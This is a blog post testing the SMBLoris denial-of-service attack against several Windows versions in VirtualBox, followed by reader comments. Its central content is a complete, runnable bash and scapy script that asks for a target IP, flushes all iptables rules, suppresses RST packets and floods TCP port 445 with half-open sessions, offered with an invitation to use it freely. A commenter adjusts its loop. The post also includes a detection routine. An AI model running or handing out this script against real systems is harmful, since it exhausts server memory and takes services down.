SMBLoris on Windows – tests

Last weekend some interesting news came out of DEFCON 25 about a new SMB denial-of-service attack, technically similar to the notorious Slowloris attack against Apache.

Please refer to the following page for more information about SMBLoris: https://smbloris.com/

There is also a demonstration in Sam Bowne's YouTube video: https://www.youtube.com/watch?v=Y77er0gzQqA

I have transferred the demonstration from his video into a single script to play around with; save it however you wish.

#!/bin/bash
# SMBLoris demo: open many TCP 445 sessions with forged SYN/ACK handshakes and
# send only the 4-byte NBSS header that announces a 131071-byte payload, so the
# target reserves memory for every session while nothing more ever arrives.
# Needs root (raw sockets, iptables) and Python 2 with python-scapy installed.
clear
echo "***************************************************************"
echo " MS Windows SMB Remote DOS - need access to TCP 445 "
echo " Thx to Sam Bowne & DEFCON 25 "
echo "***************************************************************"
if [ "$(id -u)" -ne 0 ]; then
    echo "[-] Run as root: raw sockets and iptables are needed"
    exit 1
fi
echo "[*] Checking if python-scapy module is installed "
if ! python -c "import scapy" 2>/dev/null; then
    echo "[-] Scapy not found please run apt-get install python-scapy"
    exit 1
fi
echo "[*] Scapy found "
echo "[*] Setting iptables to stop RST packets "

# The kernel knows nothing about the handshakes scapy forges and would answer the
# SYN/ACKs with RSTs, tearing every session down. Drop outgoing RSTs instead.
# Note: -F flushes all existing filter rules first.
iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

echo -e "Remote Windows SMB host IP ? \c"
read ip
echo -e "How many threads are we gonna use ? [90000 is good] : \c"
read threads

# Generate the worker script; $ip and $threads are expanded into it here.
cat > smb-dos.py <<EOF
from scapy.all import *
import sys

p0 = int(sys.argv[1])            # first source port for this worker

conf.L3socket = L3RawSocket

i = IP()
i.dst = "$ip"
t = TCP()
t.dport = 445

# Source ports above 65535 do not exist, so stop there whatever was asked for.
for p in range(p0, min(p0 + $threads, 65536)):
    print p
    t.sport = p
    t.flags = "S"

    r = sr1(i/t, timeout=2, verbose=0)
    if r is None or not r.haslayer(TCP) or r[TCP].flags & 0x12 != 0x12:
        continue                 # no SYN/ACK: port closed, filtered or dropped
    rt = r[TCP]
    t.ack = rt.seq + 1
    t.seq = rt.ack
    t.flags = "A"
    # NBSS header: type 0x00, length-extension flag set, low 16 bits 0xffff,
    # i.e. 0x1ffff = 131071 bytes announced, none of which will follow.
    sbss = '\x00\x01\xff\xff'
    send(i/t/sbss, verbose=0)
EOF
ls -la smb-dos.py
echo "[*] Running SMB DOS against $ip"
sleep 2
# Ten workers, each starting 1000 ports further on (their ranges overlap when
# threads > 1000, exactly as in the original demo).
for start in 0 1000 2000 3000 4000 5000 6000 7000 8000 9000; do
    python smb-dos.py $start &
done
wait

The script is pretty self-explanatory, feel free to do whatever you want with it.
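What makes the four payload bytes work is the NetBIOS session service header (RFC 1002, section 4.3.1): one type byte, one flags byte whose least significant bit extends the length, and a 16-bit length, so `\x00\x01\xff\xff` announces a 0x1ffff = 131071-byte session message that never arrives. The following Python is an added example, not code from the post or from smbloris.com: it encodes and decodes that header, and then runs a simple detection over constructed per-connection records (source IP, source port, bytes the client has sent on TCP 445 so far) to flag sources holding many sessions that announce a large payload but deliver almost none of it. The thresholds (64 KiB declared, 50 sessions, under 1% delivered) and the sample addresses are assumptions chosen for the illustration.

```python
import struct
from collections import defaultdict

NBSS_SESSION_MESSAGE = 0x00
NBSS_MAX_LENGTH = 0x1FFFF          # 17-bit length field: 131071 bytes


def nbss_header(length, msg_type=NBSS_SESSION_MESSAGE):
    """Build the 4-byte NetBIOS session service header (RFC 1002, 4.3.1).

    Byte 0 is the message type, byte 1 carries the length-extension flag in
    its least significant bit, bytes 2-3 carry the low 16 bits of the length.
    """
    if not 0 <= length <= NBSS_MAX_LENGTH:
        raise ValueError("NBSS length must fit in 17 bits")
    flags = (length >> 16) & 0x01
    return struct.pack("!BBH", msg_type, flags, length & 0xFFFF)


def parse_nbss_header(data):
    """Decode the first four bytes on the wire into (msg_type, declared_length)."""
    if len(data) < 4:
        raise ValueError("an NBSS header is 4 bytes")
    msg_type, flags, low16 = struct.unpack("!BBH", data[:4])
    return msg_type, ((flags & 0x01) << 16) | low16


def smbloris_suspects(connections, min_declared=64 * 1024, min_conns=50):
    """Return [(src_ip, count)] for sources holding at least `min_conns` TCP/445
    sessions that each announce `min_declared` bytes or more while having
    delivered less than 1% of it (thresholds are assumptions, tune per site).

    `connections` yields (src_ip, src_port, bytes_sent): everything the client
    has sent on that session so far, e.g. from a flow record or pcap reassembly.
    """
    starved = defaultdict(int)
    for src_ip, _src_port, sent in connections:
        if len(sent) < 4:
            continue              # no header yet: plain TCP backlog, not SMBLoris
        msg_type, declared = parse_nbss_header(sent)
        delivered = len(sent) - 4
        if (msg_type == NBSS_SESSION_MESSAGE and declared >= min_declared
                and delivered < declared // 100):
            starved[src_ip] += 1
    return sorted((ip, n) for ip, n in starved.items() if n >= min_conns)


def sample_connections():
    """Constructed sample records for the demo, not captured traffic."""
    records = []
    # 60 sessions from one host, each only the header announcing 131071 bytes
    for port in range(40000, 40060):
        records.append(("10.0.0.66", port, nbss_header(NBSS_MAX_LENGTH)))
    # a normal client: small request, body fully delivered
    body = b"\xffSMB" + b"\x00" * 96
    records.append(("10.0.0.20", 51000, nbss_header(len(body)) + body))
    # a bulk write: large declared length, but the data actually arrived
    big = b"\xfeSMB" + b"\x00" * (NBSS_MAX_LENGTH - 4)
    records.append(("10.0.0.21", 51001, nbss_header(NBSS_MAX_LENGTH) + big))
    # one slow session on its own stays below the per-source threshold
    records.append(("10.0.0.22", 51002, nbss_header(NBSS_MAX_LENGTH)))
    return records


if __name__ == "__main__":
    print(parse_nbss_header(b"\x00\x01\xff\xff"))   # (0, 131071)
    print(smbloris_suspects(sample_connections()))  # [('10.0.0.66', 60)]
```

The per-source count is the useful signal: one slow SMB client declaring a large write is normal, dozens of half-fed sessions from one address that never deliver the announced bytes are not. Counting sessions rather than bytes also catches the variant where each worker uses a different source port, which is exactly what the script above does.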

Here are my test results and videos for each of the Windows platforms I have run this script against. I was using VirtualBox on Linux with internal networking. Bear in mind that you need access to TCP 445 on the remote host for this to work, so check your firewalls ;)

Windows Server 2016 – latest patches installed

    • Memory was slowly being eaten, but after a while it gets released and starts to grow again. It could have an impact if more hosts were sending this attack simultaneously.
    • Below you can see the video of the test performed

Windows 10 x64 – latest patches installed

    • Same behaviour observed as with Windows Server 2016; as expected.
    • Below you can see the video of the test performed

Windows 7 SP1 x64 – latest patches installed

    • Here the system was brought to its knees at one point; had I run this attack from one more virtual machine, the box would have had a hard time.
    • Below you can see the video of the test performed


Windows Server 2003 R2 x64 – whatever patches were available back then

    • Actually pretty stable during the attack :)
    • Below you can see the video of the test performed

That's it!

P.S. I have tried it against Samba on Linux … no problem so far, but I would not be so sure; this has a potential level of abuse. The same goes for NFS/RPC … let's see what time brings.


3 Responses to SMBLoris on Windows – tests

  1. zimmaro says:

    Hi!!!
    As always, thanks for sharing!!! In the script, in the line:
    echo -n 'for p in range(p0,p0+' >> smb-dos.py
    after watching the YouTube video link I've added +700:
    echo -n 'for p in range(p0,p0+700' >> smb-dos.py
    and in my Kali it SEEMS to work fine… is it correct??
    Thanks again!

  2. FREE says:

    Nice blog, followed you, go on with it :DD

  3. RipperFox says:

    Try this C implementation and see how many seconds your server lasts:
